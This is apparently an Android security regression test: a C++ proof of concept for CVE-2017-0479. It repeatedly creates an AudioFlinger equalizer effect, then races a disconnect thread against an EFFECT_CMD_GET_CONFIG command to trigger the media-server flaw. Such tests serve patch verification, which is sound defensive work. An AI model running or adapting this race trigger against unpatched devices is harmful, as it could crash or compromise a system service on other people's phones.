/** * Copyright (C) 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include #include #include #define LOG_TAG "CVE-2017-0479" #include #include #include #include #include #include #include #include using namespace android; using media::IEffect; struct EffectClient : public media::BnEffectClient { EffectClient() {} virtual binder::Status controlStatusChanged(bool controlGranted __unused) { return binder::Status::ok(); } virtual binder::Status enableStatusChanged(bool enabled __unused) { return binder::Status::ok(); } virtual binder::Status commandExecuted(int32_t cmdCode __unused, const std::vector& cmdData __unused, const std::vector& replyData __unused) { return binder::Status::ok(); } virtual binder::Status framesProcessed(int32_t frames __unused) override { return binder::Status::ok(); } }; sp gEffect; void *disconnectThread(void *) { usleep(5); if (gEffect != NULL && gEffect.get() != NULL) { gEffect->disconnect(); } return NULL; } int main() { static const effect_uuid_t EFFECT_UIID_EQUALIZER = { 0x0bed4300, 0xddd6, 0x11db, 0x8f34, {0x00, 0x02, 0xa5, 0xd5, 0xc5, 0x1b}}; effect_descriptor_t descriptor; memset(&descriptor, 0, sizeof(descriptor)); descriptor.type = EFFECT_UIID_EQUALIZER; descriptor.uuid = *EFFECT_UUID_NULL; sp effectClient(new EffectClient()); const int32_t priority = 0; audio_session_t sessionId = (audio_session_t)(128); const audio_io_handle_t io = AUDIO_IO_HANDLE_NONE; const std::string opPackageName("com.exp.poc"); int32_t id; int i, enabled; status_t err; std::vector cmdData; std::vector replyData; gEffect = NULL; pthread_t pt; const sp &audioFlinger = AudioSystem::get_audio_flinger(); AudioDeviceTypeAddr device; android::content::AttributionSourceState attributionSource; attributionSource.packageName = opPackageName; attributionSource.pid = VALUE_OR_RETURN_STATUS(legacy2aidl_pid_t_int32_t(getpid())); for (i=0; i<100; i++) { media::CreateEffectRequest request; request.desc = VALUE_OR_RETURN_STATUS( legacy2aidl_effect_descriptor_t_EffectDescriptor(descriptor)); request.client = effectClient; request.priority = priority; request.output = VALUE_OR_RETURN_STATUS(legacy2aidl_audio_io_handle_t_int32_t(io)); request.sessionId = VALUE_OR_RETURN_STATUS(legacy2aidl_audio_session_t_int32_t(sessionId)); request.device = VALUE_OR_RETURN_STATUS(legacy2aidl_AudioDeviceTypeAddress(device)); request.attributionSource = attributionSource; request.probe = false; media::CreateEffectResponse response; err = audioFlinger->createEffect(request, &response); if (err == OK) { id = response.id; enabled = response.enabled; gEffect = response.effect; descriptor = VALUE_OR_RETURN_STATUS( aidl2legacy_EffectDescriptor_effect_descriptor_t(response.desc)); } if (gEffect == NULL || err != NO_ERROR) { return -1; } pthread_create(&pt, NULL, disconnectThread, NULL); binder::Status status = gEffect->command(EFFECT_CMD_GET_CONFIG, cmdData, sizeof(effect_config_t), &replyData, &err); if (!status.isOk()) { err = status.transactionError(); } usleep(50); } sleep(2); return 0; }